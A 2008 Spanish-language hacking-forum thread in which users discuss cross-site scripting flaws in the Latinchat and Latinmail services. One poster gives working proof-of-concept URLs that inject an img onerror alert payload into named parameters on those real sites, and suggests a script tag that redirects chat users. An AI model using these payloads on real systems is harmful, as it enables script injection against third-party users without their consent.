elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Usando Git para manipular el directorio de trabajo, el índice y commits (segunda parte)


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking
| | |-+  Bugs y Exploits
| | | |-+  Nivel Web (Moderadores: sirdarckcat, WHK)
| | | | |-+  Bug Latinchat
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] 2 Ir Abajo Respuesta Imprimir
Autor Tema: Bug Latinchat  (Leído 7,594 veces)
jeireuz

Desconectado Desconectado

Mensajes: 38


¿No es curioso encontrar alguien como yo?


Ver Perfil
Bug Latinchat
« en: 16 Febrero 2008, 03:06 am »

Bien desde hace mucho, que conozco este bug

el cualquien ventana de platica es posible

enviar alertas, y cualquier tipo de senterncia java Script y VBS
En línea

La realidad es la veracidad de la creencia de la propia existencia.
bigsnake


Desconectado Desconectado

Mensajes: 626


Ver Perfil
Re: Bug Latinchat
« Respuesta #1 en: 16 Febrero 2008, 13:50 pm »

enviar sentencias de script??
a que te refieres??
se podrian ejecutar archivos remotamente de esa forma???

dw
En línea

6666

Desconectado Desconectado

Mensajes: 146


Wikileaks.org


Ver Perfil
Re: Bug Latinchat
« Respuesta #2 en: 16 Febrero 2008, 16:31 pm »

si .. la verdad que tmb conozco uno quizas sea el mismo .. se puede meter codigo en la ventana de chat .. quizas sea explotable. me pondre a ver que encuentro.yo pensaba que tenia html injection pero al final no le llegaba mi codigo al resto asi que me olvide.

salu2!
En línea

Rozor

Desconectado Desconectado

Mensajes: 270


As I Walk Through The Valley Of The Shadow Of Dead


Ver Perfil WWW
Re: Bug Latinchat
« Respuesta #3 en: 17 Febrero 2008, 18:53 pm »

¿Y la demostración?. Yo conozco desde hace tiempo un bug en el CNI y donde quiera si no lo demuestro....
En línea

out in the streets they call it murder....
6666

Desconectado Desconectado

Mensajes: 146


Wikileaks.org


Ver Perfil
Re: Bug Latinchat
« Respuesta #4 en: 18 Febrero 2008, 00:46 am »

Desmostrcion? no perdere tiempo en subir imagenes pero si podes ir a una sala de latinchat y donde escribis el mensaje pones <img src="URL"> y mostrara la imagen.
En línea

Rozor

Desconectado Desconectado

Mensajes: 270


As I Walk Through The Valley Of The Shadow Of Dead


Ver Perfil WWW
Re: Bug Latinchat
« Respuesta #5 en: 18 Febrero 2008, 11:06 am »

No me referia a capturas me referia a lo que acabas de decir eso es la prueba de concepto ( PoC ) y es la demostración ;)
En línea

out in the streets they call it murder....
berz3k
Colaborador
***
Desconectado Desconectado

Mensajes: 1.212



Ver Perfil
Re: Bug Latinchat
« Respuesta #6 en: 18 Febrero 2008, 11:38 am »


Es importante antes de postear un nuevo tema leer y probar, mejor aun; realizar alguna especie de PoC (Proof Of Concept ), con estos detalles podremos ayudar o aportar mejores ideas para un buen entendimiento o posible "explotacion", no lanzar preguntas o posibles fallos "on air", tampoco son necesarios los "screenshots" o patallazos a menos que se requiera profundizar o detallar algun aspecto ademas de obsfuscar los detalles comprometedores. Leer las reglas del foro.


-berz3k.

@z1x2c3z1x2c3| cuanto tiempo podras invertir en presionar el boton "Impr Pant" y subirla al publico? 8 horas ? 10 horas? las imagenes, video o code, son la mejor parte de un PoC.



En línea

6666

Desconectado Desconectado

Mensajes: 146


Wikileaks.org


Ver Perfil
Re: Bug Latinchat
« Respuesta #7 en: 20 Febrero 2008, 05:09 am »

Latinchat XSS

imagen:

http://img204.¡mageshack.us/img204/4500/43171804ii3.jpg


Input vulnerable 'UserName'

http://login04.latinchat.com/magma_qa/templates/modules/result/T2.php?UserName=%3Cimg%20src=http:%20onerror=alert(String.fromCharCode(88,83,83))%20/%3E&InstanceID=R31_1-1

--------------------------------------------------------------------------------------------------------------------------------------------------------------
Latin mail
http://img254.¡mageshack.us/img254/2719/pantallazo1xp1.png


http://www.latinmail.com/nousuario.php?domain=%3Cimg%20src=http:%20onerror=alert(String.fromCharCode(88,83,83))%20/%3E

------------------------------------------------------------------

ventana de chat

Código:
http://img411.¡mageshack.us/img411/7/dibujoaz4.jpg
Código:
http://img411.¡mageshack.us/img411/2485/dibujozr6.jpg

« Última modificación: 20 Febrero 2008, 14:20 pm por z1x2c3z1x2c3| » En línea

bigsnake


Desconectado Desconectado

Mensajes: 626


Ver Perfil
Re: Bug Latinchat
« Respuesta #8 en: 20 Febrero 2008, 16:37 pm »

pero, esto no se puede explotar de ninguna otra forma??
vease ejecucion archivos remota o algo por el estilo
grx
dw
En línea

6666

Desconectado Desconectado

Mensajes: 146


Wikileaks.org


Ver Perfil
Re: Bug Latinchat
« Respuesta #9 en: 20 Febrero 2008, 16:41 pm »

se puede ejecutar vbs o javascript por ejemplo <script>document.location='lala.js'</script> mm no se que màs se puede hacer remoto ..
yo habia encontrado esto

http://foro.elhacker.net/index.php/topic,197376.0.html
En línea

Páginas: [1] 2 Ir Arriba Respuesta Imprimir 

Ir a:  
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines